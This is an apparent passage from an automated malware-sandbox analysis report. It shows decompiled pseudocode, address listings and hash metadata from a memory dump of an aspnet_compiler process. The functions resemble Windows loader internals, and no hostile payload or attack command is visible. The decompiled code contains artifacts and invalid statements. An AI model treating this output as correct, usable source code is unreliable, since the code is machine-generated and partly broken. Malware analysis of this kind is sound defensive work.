                          										 *(_t237 - 0x40) = _t224;
                          										 *(_t237 - 0x50) = _t224;
                          										_t193 =  *(_t237 - 0x44);
                          										continue;
                          									}
                          									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
                          									goto L17;
                          								}
                          								 *_t235 = _t236;
                          								_t165 = 0x10 + _t163 * 0xc;
                          								__eflags = _t165;
                          								_push(_t165);
                          								_push(_t235);
                          								_push(0x23);
                          								_push(0xffffffff);
                          								_t193 = E014396C0();
                          								goto L19;
                          							} else {
                          								goto L50;
                          							}
                          						}
                          						_t235 = _t237 - 0x38;
                          						 *(_t237 - 0x60) = _t235;
                          						goto L8;
                          					}
                          					goto L4;
                          				}
                          			}

































                          0x0140849b
                          0x0140849b
                          0x0140849b
                          0x0140849b
                          0x0140849d
                          0x014084a2
                          0x014084a7
                          0x014084b1
                          0x014084d8
                          0x00000000
                          0x014084b3
                          0x014084c4
                          0x014084c9
                          0x014084cd
                          0x014084cf
                          0x014084cf
                          0x014084d6
                          0x014084e6
                          0x014084e9
                          0x014084ec
                          0x014084ef
                          0x014084f2
                          0x014084f4
                          0x014084fc
                          0x01408501
                          0x01408506
                          0x01408509
                          0x014086e0
                          0x014086e5
                          0x014086e8
                          0x014086ed
                          0x014086f0
                          0x014086f2
                          0x01459afd
                          0x01459b02
                          0x014084da
                          0x014084df
                          0x014084df
                          0x014086fa
                          0x014086fd
                          0x014086fe
                          0x01408701
                          0x01408706
                          0x01408709
                          0x0140870b
                          0x00000000
                          0x00000000
                          0x01408711
                          0x01408725
                          0x01408727
                          0x0140872a
                          0x0140872c
                          0x01459af0
                          0x01459af5
                          0x01408732
                          0x01408732
                          0x01408732
                          0x01408735
                          0x01408737
                          0x01408515
                          0x01408515
                          0x01408518
                          0x0140851d
                          0x01408523
                          0x01408527
                          0x0140852b
                          0x01408537
                          0x01408539
                          0x0140853c
                          0x0140853e
                          0x0140868c
                          0x01408691
                          0x01408699
                          0x0140869b
                          0x01408744
                          0x01408748
                          0x014086a1
                          0x014086a1
                          0x014086a1
                          0x014086a4
                          0x014086a8
                          0x01459bdf
                          0x01459bdf
                          0x014086ae
                          0x014086b0
                          0x00000000
                          0x014086b6
                          0x00000000
                          0x01459be9
                          0x014086b0
                          0x01408544
                          0x0140854a
                          0x0140854d
                          0x01408551
                          0x0140876e
                          0x01408778
                          0x0140877b
                          0x01408780
                          0x01408557
                          0x01408557
                          0x0140855d
                          0x0140855d
                          0x0140856b
                          0x0140856e
                          0x01408570
                          0x01408573
                          0x01408576
                          0x01408576
                          0x01408579
                          0x0140857b
                          0x00000000
                          0x00000000
                          0x01408581
                          0x014085a0
                          0x014085a2
                          0x014085a5
                          0x014085a7
                          0x01459b1b
                          0x01459b1b
                          0x0140862e
                          0x0140862e
                          0x01408631
                          0x01408631
                          0x01408634
                          0x01408636
                          0x01408669
                          0x01408669
                          0x0140866b
                          0x01459bbf
                          0x01459bc4
                          0x01459bc8
                          0x01459bce
                          0x01459bce
                          0x01408671
                          0x01408671
                          0x01408674
                          0x01408676
                          0x01459bae
                          0x01459bae
                          0x01408676
                          0x0140867c
                          0x0140867e
                          0x01408688
                          0x01408688
                          0x00000000
                          0x0140867e
                          0x01408638
                          0x01408638
                          0x0140863b
                          0x0140863e
                          0x0140863f
                          0x01408642
                          0x01408645
                          0x01408648
                          0x0140864d
                          0x01459b69
                          0x01459b6e
                          0x01459b7b
                          0x01459b81
                          0x01459b85
                          0x01459b89
                          0x01459ba7
                          0x01459b8b
                          0x01459b91
                          0x01459b9a
                          0x01459b9f
                          0x01459b9f
                          0x01408788
                          0x0140878d
                          0x01408763
                          0x01408763
                          0x01408766
                          0x00000000
                          0x01408766
                          0x01459b70
                          0x00000000
                          0x01459b70
                          0x01408656
                          0x0140865a
                          0x0140865c
                          0x01408752
                          0x01408756
                          0x00000000
                          0x00000000
                          0x0140875e
                          0x00000000
                          0x0140875e
                          0x01408662
                          0x01408662
                          0x01408662
                          0x01408666
                          0x00000000
                          0x01408666
                          0x014085b7
                          0x014085b9
                          0x014085bc
                          0x014085bf
                          0x014085cc
                          0x014085d1
                          0x014085d4
                          0x014085db
                          0x014085de
                          0x014085e0
                          0x01459b5f
                          0x00000000
                          0x01459b5f
                          0x014085e6
                          0x014085ea
                          0x014086c3
                          0x014086c5
                          0x014086c8
                          0x014086ca
                          0x01459b16
                          0x00000000
                          0x01459b16
                          0x014086d6
                          0x014085f6
                          0x014085f6
                          0x014085f9
                          0x01408602
                          0x01408606
                          0x0140860a
                          0x0140860b
                          0x0140860e
                          0x01408611
                          0x00000000
                          0x01408611
                          0x014085f3
                          0x00000000
                          0x014085f3
                          0x01408619
                          0x0140861e
                          0x0140861e
                          0x01408621
                          0x01408622
                          0x01408623
                          0x01408625
                          0x0140862c
                          0x00000000
                          0x0140873d
                          0x00000000
                          0x0140873d
                          0x01408737
                          0x0140850f
                          0x01408512
                          0x00000000
                          0x01408512
                          0x00000000
                          0x014084d6

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 795742a4af2cd4dbb81968a188b13a2ca3987ecf89c4a185348ae0b7a365f78f
                          • Instruction ID: 53e0b19f69f996cee07636a9d1f53c5dbc78da84fe4cb424db4ee0777f009c91
                          • Opcode Fuzzy Hash: 795742a4af2cd4dbb81968a188b13a2ca3987ecf89c4a185348ae0b7a365f78f
                          • Instruction Fuzzy Hash: A7B16070E0020ADFDF16DF9AC984AAEBBB5BF54304F10412FE515AB3A6D770A941CB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 67%
                          			E0142513A(intOrPtr __ecx, void* __edx) {
                          				signed int _v8;
                          				signed char _v16;
                          				intOrPtr _v20;
                          				intOrPtr _v24;
                          				char _v28;
                          				signed int _v32;
                          				signed int _v36;
                          				signed int _v40;
                          				intOrPtr _v44;
                          				intOrPtr _v48;
                          				char _v63;
                          				char _v64;
                          				signed int _v72;
                          				signed int _v76;
                          				signed int _v80;
                          				signed int _v84;
                          				signed int _v88;
                          				signed char* _v92;
                          				signed int _v100;
                          				signed int _v104;
                          				char _v105;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				void* _t157;
                          				signed int _t159;
                          				signed int _t160;
                          				unsigned int* _t161;
                          				intOrPtr _t165;
                          				signed int _t172;
                          				signed char* _t181;
                          				intOrPtr _t189;
                          				intOrPtr* _t200;
                          				signed int _t202;
                          				signed int _t203;
                          				char _t204;
                          				signed int _t207;
                          				signed int _t208;
                          				void* _t209;
                          				intOrPtr _t210;
                          				signed int _t212;
                          				signed int _t214;
                          				signed int _t221;
                          				signed int _t222;
                          				signed int _t226;
                          				intOrPtr* _t232;
                          				signed int _t233;
                          				signed int _t234;
                          				intOrPtr _t237;
                          				intOrPtr _t238;
                          				intOrPtr _t240;
                          				void* _t245;
                          				signed int _t246;
                          				signed int _t247;
                          				void* _t248;
                          				void* _t251;
                          				void* _t252;
                          				signed int _t253;
                          				signed int _t255;
                          				signed int _t256;
                          
                          				_t255 = (_t253 & 0xfffffff8) - 0x6c;
                          				_v8 =  *0x14ed360 ^ _t255;
                          				_v32 = _v32 & 0x00000000;
                          				_t251 = __edx;
                          				_t237 = __ecx;
                          				_t212 = 6;
                          				_t245 =  &_v84;
                          				_t207 =  *((intOrPtr*)(__ecx + 0x48));
                          				_v44 =  *((intOrPtr*)(__edx + 0xc8));
                          				_v48 = __ecx;
                          				_v36 = _t207;
                          				_t157 = memset(_t245, 0, _t212 << 2);
                          				_t256 = _t255 + 0xc;
                          				_t246 = _t245 + _t212;
                          				if(_t207 == 2) {
                          					_t247 =  *(_t237 + 0x60);
                          					_t208 =  *(_t237 + 0x64);
                          					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
                          					_t159 =  *((intOrPtr*)(_t237 + 0x58));
                          					_v104 = _t159;
                          					_v76 = _t159;
                          					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
                          					_v100 = _t160;
                          					_v72 = _t160;
                          					L19:
                          					_v80 = _t208;
                          					_v84 = _t247;
                          					L8:
                          					_t214 = 0;
                          					if( *(_t237 + 0x74) > 0) {
                          						_t82 = _t237 + 0x84; // 0x124
                          						_t161 = _t82;
                          						_v92 = _t161;
                          						while( *_t161 >> 0x1f != 0) {
                          							_t200 = _v92;
                          							if( *_t200 == 0x80000000) {
                          								break;
                          							}
                          							_t214 = _t214 + 1;
                          							_t161 = _t200 + 0x10;
                          							_v92 = _t161;
                          							if(_t214 <  *(_t237 + 0x74)) {
                          								continue;
                          							}
                          							goto L9;
                          						}
                          						_v88 = _t214 << 4;
                          						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
                          						_t165 = 0;
                          						asm("adc eax, [ecx+edx+0x7c]");
                          						_v24 = _t165;
                          						_v28 = _v40;
                          						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
                          						_t221 = _v40;
                          						_v16 =  *_v92;
                          						_v32 =  &_v28;
                          						if( *(_t237 + 0x4e) >> 0xf == 0) {
                          							goto L9;
                          						}
                          						_t240 = _v48;
                          						if( *_v92 != 0x80000000) {
                          							goto L9;
                          						}
                          						 *((intOrPtr*)(_t221 + 8)) = 0;
                          						 *((intOrPtr*)(_t221 + 0xc)) = 0;
                          						 *((intOrPtr*)(_t221 + 0x14)) = 0;
                          						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
                          						_t226 = 0;
                          						_t181 = _t251 + 0x66;
                          						_v88 = 0;
                          						_v92 = _t181;
                          						do {
                          							if( *((char*)(_t181 - 2)) == 0) {
                          								goto L31;
                          							}
                          							_t226 = _v88;
                          							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
                          								_t181 = E0143D0F0(1, _t226 + 0x20, 0);
                          								_t226 = _v40;
                          								 *(_t226 + 8) = _t181;
                          								 *((intOrPtr*)(_t226 + 0xc)) = 0;
                          								L34:
                          								if(_v44 == 0) {
                          									goto L9;
                          								}
                          								_t210 = _v44;
                          								_t127 = _t210 + 0x1c; // 0x1c
                          								_t249 = _t127;
                          								E01412280(_t181, _t127);
                          								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
                          								_t185 =  *((intOrPtr*)(_t210 + 0x94));
                          								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
                          									L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
                          								}
                          								_t189 = L01414620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
                          								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
                          								if(_t189 != 0) {
                          									 *((intOrPtr*)(_t189 + 8)) = _v20;
                          									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
                          									_t232 =  *((intOrPtr*)(_t210 + 0x94));
                          									 *_t232 = _t232 + 0x10;
                          									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
                          									E0143F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
                          									_t256 = _t256 + 0xc;
                          								}
                          								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
                          								E0140FFB0(_t210, _t249, _t249);
                          								_t222 = _v76;
                          								_t172 = _v80;
                          								_t208 = _v84;
                          								_t247 = _v88;
                          								L10:
                          								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
                          								_v44 = _t238;
                          								if(_t238 != 0) {
                          									 *0x14eb1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
                          									_v44();
                          								}
                          								_pop(_t248);
                          								_pop(_t252);
                          								_pop(_t209);
                          								return E0143B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
                          							}
                          							_t181 = _v92;
                          							L31:
                          							_t226 = _t226 + 1;
                          							_t181 =  &(_t181[0x18]);
                          							_v88 = _t226;
                          							_v92 = _t181;
                          						} while (_t226 < 4);
                          						goto L34;
                          					}
                          					L9:
                          					_t172 = _v104;
                          					_t222 = _v100;
                          					goto L10;
                          				}
                          				_t247 = _t246 | 0xffffffff;
                          				_t208 = _t247;
                          				_v84 = _t247;
                          				_v80 = _t208;
                          				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
                          					_t233 = _v72;
                          					_v105 = _v64;
                          					_t202 = _v76;
                          				} else {
                          					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
                          					_v105 = 1;
                          					if(_v63 <= _t204) {
                          						_v63 = _t204;
                          					}
                          					_t202 = _v76 |  *(_t251 + 0x40);
                          					_t233 = _v72 |  *(_t251 + 0x44);
                          					_t247 =  *(_t251 + 0x38);
                          					_t208 =  *(_t251 + 0x3c);
                          					_v76 = _t202;
                          					_v72 = _t233;
                          					_v84 = _t247;
                          					_v80 = _t208;
                          				}
                          				_v104 = _t202;
                          				_v100 = _t233;
                          				if( *((char*)(_t251 + 0xc4)) != 0) {
                          					_t237 = _v48;
                          					_v105 = 1;
                          					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
                          						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
                          						_t237 = _v48;
                          					}
                          					_t203 = _t202 |  *(_t251 + 0xb8);
                          					_t234 = _t233 |  *(_t251 + 0xbc);
                          					_t247 = _t247 &  *(_t251 + 0xb0);
                          					_t208 = _t208 &  *(_t251 + 0xb4);
                          					_v104 = _t203;
                          					_v76 = _t203;
                          					_v100 = _t234;
                          					_v72 = _t234;
                          					_v84 = _t247;
                          					_v80 = _t208;
                          				}
                          				if(_v105 == 0) {
                          					_v36 = _v36 & 0x00000000;
                          					_t208 = 0;
                          					_t247 = 0;
                          					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
                          					goto L19;
                          				} else {
                          					_v36 = 1;
                          					goto L8;
                          				}
                          			}































































                          0x01425142
                          0x0142514c
                          0x01425150
                          0x01425157
                          0x01425159
                          0x0142515e
                          0x01425165
                          0x01425169
                          0x0142516c
                          0x01425172
                          0x01425176
                          0x0142517a
                          0x0142517a
                          0x0142517a
                          0x0142517f
                          0x01466d8b
                          0x01466d8e
                          0x01466d91
                          0x01466d95
                          0x01466d98
                          0x01466d9c
                          0x01466da0
                          0x01466da3
                          0x01466da7
                          0x01466e26
                          0x01466e26
                          0x01466e2a
                          0x014251f9
                          0x014251f9
                          0x014251fe
                          0x01466e33
                          0x01466e33
                          0x01466e39
                          0x01466e3d
                          0x01466e46
                          0x01466e50
                          0x00000000
                          0x00000000
                          0x01466e52
                          0x01466e53
                          0x01466e56
                          0x01466e5d
                          0x00000000
                          0x00000000
                          0x00000000
                          0x01466e5f
                          0x01466e67
                          0x01466e77
                          0x01466e7f
                          0x01466e80
                          0x01466e88
                          0x01466e90
                          0x01466e9f
                          0x01466ea5
                          0x01466ea9
                          0x01466eb1
                          0x01466ebf
                          0x00000000
                          0x00000000
                          0x01466ecf
                          0x01466ed3
                          0x00000000
                          0x00000000
                          0x01466edb
                          0x01466ede
                          0x01466ee1
                          0x01466ee8
                          0x01466eeb
                          0x01466eed
                          0x01466ef0
                          0x01466ef4
                          0x01466ef8
                          0x01466efc
                          0x00000000
                          0x00000000
                          0x01466f0d
                          0x01466f11
                          0x01466f32
                          0x01466f37
                          0x01466f3b
                          0x01466f3e
                          0x01466f41
                          0x01466f46
                          0x00000000
                          0x00000000
                          0x01466f4c
                          0x01466f50
                          0x01466f50
                          0x01466f54
                          0x01466f62
                          0x01466f65
                          0x01466f6d
                          0x01466f7b
                          0x01466f7b
                          0x01466f93
                          0x01466f98
                          0x01466fa0
                          0x01466fa6
                          0x01466fb3
                          0x01466fb6
                          0x01466fbf
                          0x01466fc1
                          0x01466fd5
                          0x01466fda
                          0x01466fda
                          0x01466fdd
                          0x01466fe2
                          0x01466fe7
                          0x01466feb
                          0x01466fef
                          0x01466ff3
                          0x0142520c
                          0x0142520c
                          0x0142520f
                          0x01425215
                          0x01425234
                          0x0142523a
                          0x0142523a
                          0x01425244
                          0x01425245
                          0x01425246
                          0x01425251
                          0x01425251
                          0x01466f13
                          0x01466f17
                          0x01466f17
                          0x01466f18
                          0x01466f1b
                          0x01466f1f
                          0x01466f23
                          0x00000000
                          0x01466f28
                          0x01425204
                          0x01425204
                          0x01425208
                          0x00000000
                          0x01425208
                          0x01425185
                          0x01425188
                          0x0142518a
                          0x0142518e
                          0x01425195
                          0x01466db1
                          0x01466db5
                          0x01466db9
                          0x0142519b
                          0x0142519b
                          0x0142519e
                          0x014251a7
                          0x014251a9
                          0x014251a9
                          0x014251b5
                          0x014251b8
                          0x014251bb
                          0x014251be
                          0x014251c1
                          0x014251c5
                          0x014251c9
                          0x014251cd
                          0x014251cd
                          0x014251d8
                          0x014251dc
                          0x014251e0
                          0x01466dcc
                          0x01466dd0
                          0x01466dd5
                          0x01466ddd
                          0x01466de1
                          0x01466de1
                          0x01466de5
                          0x01466deb
                          0x01466df1
                          0x01466df7
                          0x01466dfd
                          0x01466e01
                          0x01466e05
                          0x01466e09
                          0x01466e0d
                          0x01466e11
                          0x01466e11
                          0x014251eb
                          0x01466e1a
                          0x01466e1f
                          0x01466e21
                          0x01466e23
                          0x00000000
                          0x014251f1
                          0x014251f1
                          0x00000000
                          0x014251f1

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ba30266cf1bc6bb02e9e06e385b8c5dd7c12d6bf1b7bc4312e3857ac9d51a4f8
                          • Instruction ID: 18f8e0ee8044a99b4e03af22e75430c5579ab70372ba2718540448aa55b6accd
                          • Opcode Fuzzy Hash: ba30266cf1bc6bb02e9e06e385b8c5dd7c12d6bf1b7bc4312e3857ac9d51a4f8
                          • Instruction Fuzzy Hash: 9DC122755083818FD354CF28C580A6AFBF1BF88318F14496EF9998B362D771E885CB52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 74%
                          			E014203E2(signed int __ecx, signed int __edx) {
                          				signed int _v8;
                          				signed int _v12;
                          				signed int _v16;
                          				signed int _v20;
                          				signed int _v24;
                          				signed int _v28;
                          				signed int _v32;
                          				signed int _v36;
                          				intOrPtr _v40;
                          				signed int _v44;
                          				signed int _v48;
                          				char _v52;
                          				char _v56;
                          				char _v64;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				signed int _t56;
                          				signed int _t58;
                          				char* _t64;
                          				intOrPtr _t65;
                          				signed int _t74;
                          				signed int _t79;
                          				char* _t83;
                          				intOrPtr _t84;
                          				signed int _t93;
                          				signed int _t94;
                          				signed char* _t95;
                          				signed int _t99;
                          				signed int _t100;
                          				signed char* _t101;
                          				signed int _t105;
                          				signed int _t119;
                          				signed int _t120;
                          				void* _t122;
                          				signed int _t123;
                          				signed int _t127;
                          
                          				_v8 =  *0x14ed360 ^ _t127;
                          				_t119 = __ecx;
                          				_t105 = __edx;
                          				_t118 = 0;
                          				_v20 = __edx;
                          				_t120 =  *(__ecx + 0x20);
                          				if(E01420548(__ecx, 0) != 0) {
                          					_t56 = 0xc000022d;
                          					L23:
                          					return E0143B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
                          				} else {
                          					_v12 = _v12 | 0xffffffff;
                          					_t58 = _t120 + 0x24;
                          					_t109 =  *(_t120 + 0x18);
                          					_t118 = _t58;
                          					_v16 = _t58;
                          					E0140B02A( *(_t120 + 0x18), _t118, 0x14a5);
                          					_v52 = 0x18;
                          					_v48 = 0;
                          					0x840 = 0x40;
                          					if( *0x14e7c1c != 0) {
                          					}
                          					_v40 = 0x840;
                          					_v44 = _t105;
                          					_v36 = 0;
                          					_v32 = 0;
                          					if(E01417D50() != 0) {
                          						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                          					} else {
                          						_t64 = 0x7ffe0384;
                          					}
                          					if( *_t64 != 0) {
                          						_t65 =  *[fs:0x30];
                          						__eflags =  *(_t65 + 0x240) & 0x00000004;
                          						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
                          							_t100 = E01417D50();
                          							__eflags = _t100;
                          							if(_t100 == 0) {
                          								_t101 = 0x7ffe0385;
                          							} else {
                          								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                          							}
                          							__eflags =  *_t101 & 0x00000020;
                          							if(( *_t101 & 0x00000020) != 0) {
                          								_t118 = _t118 | 0xffffffff;
                          								_t109 = 0x1485;
                          								E01477016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
                          							}
                          						}
                          					}
                          					_t105 = 0;
                          					while(1) {
                          						_push(0x60);
                          						_push(5);
                          						_push( &_v64);
                          						_push( &_v52);
                          						_push(0x100021);
                          						_push( &_v12);
                          						_t122 = E01439830();
                          						if(_t122 >= 0) {
                          							break;
                          						}
                          						__eflags = _t122 - 0xc0000034;
                          						if(_t122 == 0xc0000034) {
                          							L38:
                          							_t120 = 0xc0000135;
                          							break;
                          						}
                          						__eflags = _t122 - 0xc000003a;
                          						if(_t122 == 0xc000003a) {
                          							goto L38;
                          						}
                          						__eflags = _t122 - 0xc0000022;
                          						if(_t122 != 0xc0000022) {
                          							break;
                          						}
                          						__eflags = _t105;
                          						if(__eflags != 0) {
                          							break;
                          						}
                          						_t109 = _t119;
                          						_t99 = E014769A6(_t119, __eflags);
                          						__eflags = _t99;
                          						if(_t99 == 0) {
                          							break;
                          						}
                          						_t105 = _t105 + 1;
                          					}
                          					if( !_t120 >= 0) {
                          						L22:
                          						_t56 = _t120;
                          						goto L23;
                          					}
                          					if( *0x14e7c04 != 0) {
                          						_t118 = _v12;
                          						_t120 = E0147A7AC(_t119, _t118, _t109);
                          						__eflags = _t120;
                          						if(_t120 >= 0) {
                          							goto L10;
                          						}
                          						__eflags =  *0x14e7bd8;
                          						if( *0x14e7bd8 != 0) {
                          							L20:
                          							if(_v12 != 0xffffffff) {
                          								_push(_v12);
                          								E014395D0();
                          							}
                          							goto L22;
                          						}
                          					}
                          					L10:
                          					_push(_v12);
                          					_t105 = _t119 + 0xc;
                          					_push(0x1000000);
                          					_push(0x10);
                          					_push(0);
                          					_push(0);
                          					_push(0xf);
                          					_push(_t105);
                          					_t120 = E014399A0();
                          					if(_t120 < 0) {
                          						__eflags = _t120 - 0xc000047e;
                          						if(_t120 == 0xc000047e) {
                          							L51:
                          							_t74 = E01473540(_t120);
                          							_t119 = _v16;
                          							_t120 = _t74;
                          							L52:
                          							_t118 = 0x1485;
                          							E013FB1E1(_t120, 0x1485, 0, _t119);
                          							goto L20;
                          						}
                          						__eflags = _t120 - 0xc000047f;
                          						if(_t120 == 0xc000047f) {
                          							goto L51;
                          						}
                          						__eflags = _t120 - 0xc0000462;
                          						if(_t120 == 0xc0000462) {
                          							goto L51;
                          						}
                          						_t119 = _v16;
                          						__eflags = _t120 - 0xc0000017;
                          						if(_t120 != 0xc0000017) {
                          							__eflags = _t120 - 0xc000009a;
                          							if(_t120 != 0xc000009a) {
                          								__eflags = _t120 - 0xc000012d;
                          								if(_t120 != 0xc000012d) {
                          									_v28 = _t119;
                          									_push( &_v56);
                          									_push(1);
                          									_v24 = _t120;
                          									_push( &_v28);
                          									_push(1);
                          									_push(2);
                          									_push(0xc000007b);
                          									_t79 = E0143AAF0();
                          									__eflags = _t79;
                          									if(_t79 >= 0) {
                          										__eflags =  *0x14e8474 - 3;
                          										if( *0x14e8474 != 3) {
                          											 *0x14e79dc =  *0x14e79dc + 1;
                          										}
                          									}
                          								}
                          							}
                          						}
                          						goto L52;
                          					}
                          					if(E01417D50() != 0) {
                          						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                          					} else {
                          						_t83 = 0x7ffe0384;
                          					}
                          					if( *_t83 != 0) {
                          						_t84 =  *[fs:0x30];
                          						__eflags =  *(_t84 + 0x240) & 0x00000004;
                          						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
                          							_t94 = E01417D50();
                          							__eflags = _t94;
                          							if(_t94 == 0) {
                          								_t95 = 0x7ffe0385;
                          							} else {
                          								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                          							}
                          							__eflags =  *_t95 & 0x00000020;
                          							if(( *_t95 & 0x00000020) != 0) {
                          								E01477016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
                          							}
                          						}
                          					}
                          					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
                          						if( *0x14e8708 != 0) {
                          							_t118 =  *0x7ffe0330;
                          							_t123 =  *0x14e7b00; // 0x0
                          							asm("ror esi, cl");
                          							 *0x14eb1e0(_v12, _v20, 0x20);
                          							_t93 =  *(_t123 ^  *0x7ffe0330)();
                          							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
                          							asm("sbb esi, esi");
                          							_t120 =  ~_t50 & _t93;
                          						} else {
                          							_t120 = 0;
                          						}
                          					}
                          					if( !_t120 >= 0) {
                          						L19:
                          						_push( *_t105);
                          						E014395D0();
                          						 *_t105 =  *_t105 & 0x00000000;
                          						goto L20;
                          					}
                          					_t120 = E01407F65(_t119);
                          					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
                          						__eflags = _t120;
                          						if(_t120 < 0) {
                          							goto L19;
                          						}
                          						 *(_t119 + 0x64) = _v12;
                          						goto L22;
                          					}
                          					goto L19;
                          				}
                          			}








































                          0x014203f1
                          0x014203f7
                          0x014203f9
                          0x014203fb
                          0x014203fd
                          0x01420400
                          0x0142040a
                          0x01464c7a
                          0x01420537
                          0x01420547
                          0x01420410
                          0x01420410
                          0x01420414
                          0x01420417
                          0x0142041a
                          0x01420421
                          0x01420424
                          0x0142042b
                          0x0142043b
                          0x0142043e
                          0x0142043f
                          0x0142043f
                          0x01420446
                          0x01420449
                          0x0142044c
                          0x0142044f
                          0x01420459
                          0x01464c8d
                          0x0142045f
                          0x0142045f
                          0x0142045f
                          0x01420467
                          0x01464c97
                          0x01464c9d
                          0x01464ca4
                          0x01464caa
                          0x01464caf
                          0x01464cb1
                          0x01464cc3
                          0x01464cb3
                          0x01464cbc
                          0x01464cbc
                          0x01464cc8
                          0x01464ccb
                          0x01464cd7
                          0x01464cda
                          0x01464cdf
                          0x01464cdf
                          0x01464ccb
                          0x01464ca4
                          0x0142046d
                          0x0142046f
                          0x0142046f
                          0x01420471
                          0x01420476
                          0x0142047a
                          0x0142047b
                          0x01420483
                          0x01420489
                          0x0142048d
                          0x00000000
                          0x00000000
                          0x01464ce9
                          0x01464cef
                          0x01464d22
                          0x01464d22
                          0x00000000
                          0x01464d22
                          0x01464cf1
                          0x01464cf7
                          0x00000000
                          0x00000000
                          0x01464cf9
                          0x01464cff
                          0x00000000
                          0x00000000
                          0x01464d05
                          0x01464d07
                          0x00000000
                          0x00000000
                          0x01464d0d
                          0x01464d0f
                          0x01464d14
                          0x01464d16
                          0x00000000
                          0x00000000
                          0x01464d1c
                          0x01464d1c
                          0x01420499
                          0x01420535
                          0x01420535
                          0x00000000
                          0x01420535
                          0x014204a6
                          0x01464d2c
                          0x01464d37
                          0x01464d39
                          0x01464d3b
                          0x00000000
                          0x00000000
                          0x01464d41
                          0x01464d48
                          0x01420527
                          0x0142052b
                          0x0142052d
                          0x01420530
                          0x01420530
                          0x00000000
                          0x0142052b
                          0x01464d4e
                          0x014204ac
                          0x014204ac
                          0x014204af
                          0x014204b2
                          0x014204b7
                          0x014204b9
                          0x014204bb
                          0x014204bd
                          0x014204bf
                          0x014204c5
                          0x014204c9
                          0x01464d53
                          0x01464d59
                          0x01464db9
                          0x01464dba
                          0x01464dbf
                          0x01464dc2
                          0x01464dc4
                          0x01464dc7
                          0x01464dce
                          0x00000000
                          0x01464dce
                          0x01464d5b
                          0x01464d61
                          0x00000000
                          0x00000000
                          0x01464d63
                          0x01464d69
                          0x00000000
                          0x00000000
                          0x01464d6b
                          0x01464d6e
                          0x01464d74
                          0x01464d76
                          0x01464d7c
                          0x01464d7e
                          0x01464d84
                          0x01464d89
                          0x01464d8c
                          0x01464d8d
                          0x01464d92
                          0x01464d95
                          0x01464d96
                          0x01464d98
                          0x01464d9a
                          0x01464d9f
                          0x01464da4
                          0x01464da6
                          0x01464da8
                          0x01464daf
                          0x01464db1
                          0x01464db1
                          0x01464daf
                          0x01464da6
                          0x01464d84
                          0x01464d7c
                          0x00000000
                          0x01464d74
                          0x014204d6
                          0x01464de1
                          0x014204dc
                          0x014204dc
                          0x014204dc
                          0x014204e4
                          0x01464deb
                          0x01464df1
                          0x01464df8
                          0x01464dfe
                          0x01464e03
                          0x01464e05
                          0x01464e17
                          0x01464e07
                          0x01464e10
                          0x01464e10
                          0x01464e1c
                          0x01464e1f
                          0x01464e35
                          0x01464e35
                          0x01464e1f
                          0x01464df8
                          0x014204f1
                          0x014204fa
                          0x01464e3f
                          0x01464e47
                          0x01464e5b
                          0x01464e61
                          0x01464e67
                          0x01464e69
                          0x01464e71
                          0x01464e73
                          0x01420500
                          0x01420500
                          0x01420500
                          0x014204fa
                          0x01420508
                          0x0142051d
                          0x0142051d
                          0x0142051f
                          0x01420524
                          0x00000000
                          0x01420524
                          0x01420515
                          0x01420517
                          0x01464e7a
                          0x01464e7c
                          0x00000000
                          0x00000000
                          0x01464e85
                          0x00000000
                          0x01464e85
                          0x00000000
                          0x01420517

